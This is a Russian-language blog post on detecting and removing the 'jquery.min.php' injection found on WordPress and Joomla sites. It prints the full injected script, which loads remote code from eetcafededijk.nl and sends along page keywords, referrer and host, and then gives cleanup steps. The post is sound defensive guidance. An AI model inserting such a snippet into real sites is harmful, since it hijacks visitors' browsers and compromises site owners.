jQuery.min.php malware заразил тысячи сайтов

Фейковые вставки jQuery стали довольно популярны у взломщиков с тех пор, как выросла популярность самой библиотеки. На этот раз атаке подверглись движки Joomla и WordPress, скрипт использует инъекцию jQuery в основном для «черного» продвижения сайтов.

Одним из признаков заражения, который легко обнаружить – замедление работы сайта. При этом в Фаерфоксе можно наблюдать в нижнем левом углу «ожидание ответа от… site.com», где site.com – любой сайт непонятного происхождения. (Я столкнулся с eetcafededijk.nl, что сразу и навело меня на мысль о действии вредоносных скриптов.)

Где искать проблему?

Первое, куда стоит заглянуть, это файл шаблона header.php (WordPress) или index.php (Joomla). В секции <head> наверняка обнаружится нечто вроде

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
||document.referrer!==undefined||document.referrer!==''||document.referrer!==null)
{document.write('<script type="text/javascript" src="http://eetcafededijk.nl/js/jquery.min.php?c_utt=G91825&c_utm='
+encodeURIComponent('http://eetcafededijk.nl/js/jquery.min.php'+'?'+'default_keyword='
+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');
if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords")
{keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?
(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+
'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+
'"><'+'/script>');}</script>

Именно в таком варианте выглядеть коду необязательно, потому стоит просмотреть секцию внимательно, ища все подозрительные вставки. Общими скорее всего будут куски «setTimeout(10);» и/или js/jquery.min.php?. Поскольку взломщики регулярно модифицируют код или заражают один и тот же сайт повторно, вставок может быть несколько. Так же, робот инфицирующий сайты в автоматическом режиме, следуя заложенной в него логике будет пытаться заразить все фрагменты кода содержащие выражение </head>.
После просмотра файлов шаблона, необходимо проверить наличие файла jquery.min.php (чаще всего прячется в yoursite.com/js/) и при обнаружении удалить.

Далее всё по стандарту: меняем пароли, проверяем в админку на наличие лишних учетных записей, обновляем движок и плагины, проверяемся на одном из malware scanner для сайтов.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

двадцать − пять =